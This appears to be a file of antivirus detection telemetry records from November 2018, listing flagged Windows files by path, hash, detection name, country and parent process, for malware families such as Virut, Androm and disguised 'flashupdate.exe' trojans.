  Row(detection=Row(filename='en-us.pif', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\start\\en-US\\en-US.pif', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='images.scr', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\start\\en-US\\images\\images.scr', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7.3.4.exe', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\7.3.4.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='reader.pif', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\Reader.pif', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='js.scr', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\start\\en-US\\js\\js.scr', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gider ömer.exe', filepath='C:\\Users\\X\\CARİ GİDER ÖMER\\GİDER ÖMER.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='advertisement.pif', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\advertisement\\advertisement.pif', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='documents.exe', filepath='C:\\Users\\X\\Documents\\Documents.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Pictures\\Pictures.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='http.bat', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\advertisement\\http\\http.bat', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='listesi.scr', filepath='C:\\Users\\X\\ŞOFÖR LİSTESİ\\LİSTESİ.scr', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloads.exe', filepath='C:\\Users\\X\\Downloads\\Downloads.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='catch!.bat', filepath='C:\\Users\\X\\Documents\\Catch!\\Catch!.bat', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='css.exe', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\start\\en-US\\css\\css.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='start.pif', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\start\\start.pif', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='plugin.dll', filepath='\\\\?\\D:\\game\\天堂M\\Anubisbot\\plugin.dll', filesize=2560000, name='TR/BHO.Gen.#M300.#R3363'), hash='5da2bc60bcb4645cc005ccad3fbd9a109dbaa948506a9ccaab246c034bd5aa30', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:46:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='plugin.dll', filepath='F:\\狗頭\\Anubis-Lineage Mobile Bot_V1.1.8.5\\Anubis-Lineage Mobile Bot\\plugin.dll', filesize=2560000, name='TR/BHO.Gen.#M300.#R3363'), hash='5da2bc60bcb4645cc005ccad3fbd9a109dbaa948506a9ccaab246c034bd5aa30', metadata=Row(cmdline='\\\\\\/s \\\\\\".\\\\\\\\plugin.dll\\\\\\"', country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\SysWOW64\\regsvr32.exe', parentsize=20992, timestamp='2018-11-01T14:09:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='plugin.dll', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Anubis-Lineage Mobile Bot\\plugin.dll', filesize=2560000, name='TR/BHO.Gen.#M300.#R3363'), hash='5da2bc60bcb4645cc005ccad3fbd9a109dbaa948506a9ccaab246c034bd5aa30', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:46:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-034551-41946ba8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1388de90\\AVSCAN-20181102-034515-3B35AE91\\AVSCAN-20181102-034551-41946BA8', filesize=2176000, name='HEUR/AGEN.1017525.#M1.#R1'), hash='5deadbbe1b1bb51a89a4c03220f1a927b807aa620afa63b4314a7ac9437e0ee5', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:46:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='forza+horizon+4.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\7zO876DA9A1\\Forza+Horizon+4.exe', filesize=2176000, name='HEUR/AGEN.1017525.#M1.#R1'), hash='5deadbbe1b1bb51a89a4c03220f1a927b807aa620afa63b4314a7ac9437e0ee5', metadata=Row(cmdline='-Embedding', country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SettingSyncHost.exe', parentsize=828320, timestamp='2018-11-01T18:27:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='5e934f7a46d8fdd46bbcc512b4e12d55dc39c6aa56ab224b089320c81e0b3b7e', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-01T16:30:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='5e934f7a46d8fdd46bbcc512b4e12d55dc39c6aa56ab224b089320c81e0b3b7e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-01T16:46:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='5e934f7a46d8fdd46bbcc512b4e12d55dc39c6aa56ab224b089320c81e0b3b7e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:47:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='5e934f7a46d8fdd46bbcc512b4e12d55dc39c6aa56ab224b089320c81e0b3b7e', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-01T16:25:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='5eb22c98e6e97f8363ce8e0fd3228120bec8d96e85fe9a6c2bbdd0c365b7e53e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='leogadget-downloader.exe', filepath='J:\\GWF\\LW-E\\Gwf-2\\Update\\Miniaturanwendungen\\leogadget-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='5eb4196ba6cc00f5eec70e214d8c069ce03af20e0364d79642d551531721287a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD.EXE', parentsize=1074896, timestamp='2018-11-01T19:39:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-204004-69d49c74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4663d008\\AVSCAN-20181101-203944-58D3C140\\AVSCAN-20181101-204004-69D49C74', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='5eb4196ba6cc00f5eec70e214d8c069ce03af20e0364d79642d551531721287a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:40:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='5eb9b52bb5a2ecf3f0067d38b8af45fa144c3a1818a5c8a8a231da2a5014ae87', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.categorizing\\5EB9B52BB5A2ECF3F0067D38B8AF45FA144C3A1818A5C8A8A231DA2A5014AE87', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='5eb9b52bb5a2ecf3f0067d38b8af45fa144c3a1818a5c8a8a231da2a5014ae87', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T11:29:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215356-210ee935', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_632bd233\\AVSCAN-20181101-214038-A3F4827E\\AVSCAN-20181101-215356-210EE935', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='5eeb9ad2e0ac357eeb6617b2af46cbd4509259c0e6bdd5c2d85896b931928fc0', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:53:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='newhpnamsc9.htm', filepath='C:\\Windows.old\\Users\\CP\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\7RESSCWK\\newHPNAMSC9.htm', filesize=248000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='5f017c98a0589fdf274a5d1d06f2e639b87215010d6ee79f2366372a8941061f', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T17:26:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-013156-f72189e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_860149a1\\AVSCAN-20181102-013008-E1F1B96F\\AVSCAN-20181102-013156-F72189E4', filesize=248000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='5f017c98a0589fdf274a5d1d06f2e639b87215010d6ee79f2366372a8941061f', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:32:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='trustedinstaller.exe', filepath='C:\\Temp\\TrustedInstaller.exe', filesize=192000, name='BDS/Androm.EB.73.#M0.#R0'), hash='5f17703ba5daa3a0d89ebcf8edc87f7035aac00d53945e9d0068ac46f5e267d6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:56:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0f43d.tmp', filepath='C:\\Users\\dell\\AppData\\Local\\Temp\\0F43D.tmp', filesize=192000, name='BDS/Androm.EB.73.#M0.#R0'), hash='5f17703ba5daa3a0d89ebcf8edc87f7035aac00d53945e9d0068ac46f5e267d6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:56:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='trustedinstaller.exe', filepath='C:\\Temp\\TrustedInstaller.exe', filesize=192000, name='BDS/Androm.EB.73.#M0.#R0'), hash='5f17703ba5daa3a0d89ebcf8edc87f7035aac00d53945e9d0068ac46f5e267d6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T10:44:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='trustedinstaller.exe', filepath='C:\\Temp\\TrustedInstaller.exe', filesize=192000, name='BDS/Androm.EB.73.#M0.#R0'), hash='5f17703ba5daa3a0d89ebcf8edc87f7035aac00d53945e9d0068ac46f5e267d6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T10:44:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='trustedinstaller.exe', filepath='C:\\Temp\\TrustedInstaller.exe', filesize=192000, name='BDS/Androm.EB.73.#M0.#R0'), hash='5f17703ba5daa3a0d89ebcf8edc87f7035aac00d53945e9d0068ac46f5e267d6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T10:44:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-01T13:59:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='AZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:40:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T15:34:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (2).exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\flashupdate (2).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='AZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:40:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (3).exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\flashupdate (3).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='AZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:40:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-083716-d3572b8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_adc73a22\\AVSCAN-20181101-083300-C4707F5A\\AVSCAN-20181101-083716-D3572B8C', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:37:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3904296, timestamp='2018-11-01T12:14:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-104453-fa3fcd61', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-104406-AAF951B0\\AVSCAN-20181101-104453-FA3FCD61', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:43:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T13:09:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141203-0795216a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13cc31a3\\AVSCAN-20181101-140956-FB5DC91F\\AVSCAN-20181101-141203-0795216A', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:12:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141140-055964f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13cc31a3\\AVSCAN-20181101-140956-FB5DC91F\\AVSCAN-20181101-141140-055964F7', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:11:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T15:39:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141125-03e6f122', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13cc31a3\\AVSCAN-20181101-140956-FB5DC91F\\AVSCAN-20181101-141125-03E6F122', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:11:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T13:08:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (3).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (3).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T13:08:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:54:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Documents and Settings\\X\\Mes documents\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:42:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$r27bbfp.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-2192791235-2971643662-3870428667-1000\\$R27BBFP.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T02:46:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$r3vcqpq.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-2192791235-2971643662-3870428667-1000\\$R3VCQPQ.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T02:46:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$r27bbfp.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-2192791235-2971643662-3870428667-1000\\$R27BBFP.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T02:46:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-161811-01751669', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_291c2520\\AVSCAN-20181031-161552-EFC98C27\\AVSCAN-20181031-161811-01751669', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:18:15Z'), dt=datetime.date(2018, 11, 1)),
